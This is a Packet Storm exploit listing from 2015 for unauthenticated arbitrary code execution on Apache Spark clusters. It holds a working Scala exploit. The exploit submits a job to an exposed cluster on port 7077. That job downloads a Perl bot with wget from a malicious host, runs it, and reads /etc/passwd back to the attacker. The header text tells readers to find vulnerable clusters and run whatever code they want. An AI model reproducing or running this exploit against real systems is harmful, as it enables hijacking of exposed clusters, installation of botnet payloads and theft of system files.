what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Spark Cluster 1.3.x Arbitrary Code Execution

Apache Spark Cluster 1.3.x Arbitrary Code Execution
Posted Apr 16, 2015
Authored by Akhil Das

Apache Spark Cluster version 1.3.x suffers from a code execution vulnerability.

tags | exploit, code execution
SHA-256 | fa52b7d291365e260eefbd50b902865d8d250fb29a92eebfc41a473b27334295

Apache Spark Cluster 1.3.x Arbitrary Code Execution

Change Mirror Download
# Exploit Title: Arbitary Code Execution in Apache Spark Cluster
# Date: 23/03/2015
# Exploit Author: AkhlD (AkhilDas) <akhld@live.com> CodeBreach.in
# Vendor Homepage: https://spark.apache.org/
# Software Link: https://spark.apache.org/downloads.html
# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# Tested on: 1.2.1

# Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for
reviewing.
# Reference(s) :
http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/
# Exploit URL : https://github.com/akhld/spark-exploit/

# Spark clusters which are not secured with proper firewall can be taken
over easily (Since it does not have
# any authentication mechanism), this exploit simply runs arbitarty codes
over the cluster.
# All you have to do is, find a vulnerable Spark cluster (usually runs on
port 7077) add that host to your
# hosts list so that your system will recognize it (here its
spark-b-akhil-master pointing
# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary
codes that you want to execute.

# Language: Scala


import org.apache.spark.{SparkContext, SparkConf}

/**
* Created by akhld on 23/3/15.
*/

object Exploit {
def main(arg: Array[String]) {
val sconf = new SparkConf()
.setMaster("spark://spark-b-akhil-master:7077") // Set this to the
vulnerable host URI
.setAppName("Exploit")
.set("spark.cores.max", "2")
.set("spark.executor.memory", "2g")
.set("spark.driver.host","hacked.work") // Set this to your host from
where you launch the attack

val sc = new SparkContext(sconf)
sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar")

val exploit = sc.parallelize(1 to 1).map(x=>{
//Replace these with whatever you want to get executed
val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
val y = "perl bot.pl".!
scala.io.Source.fromFile("/etc/passwd").mkString
})
exploit.collect().foreach(println)
}
}




Thanks
Best Regards

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close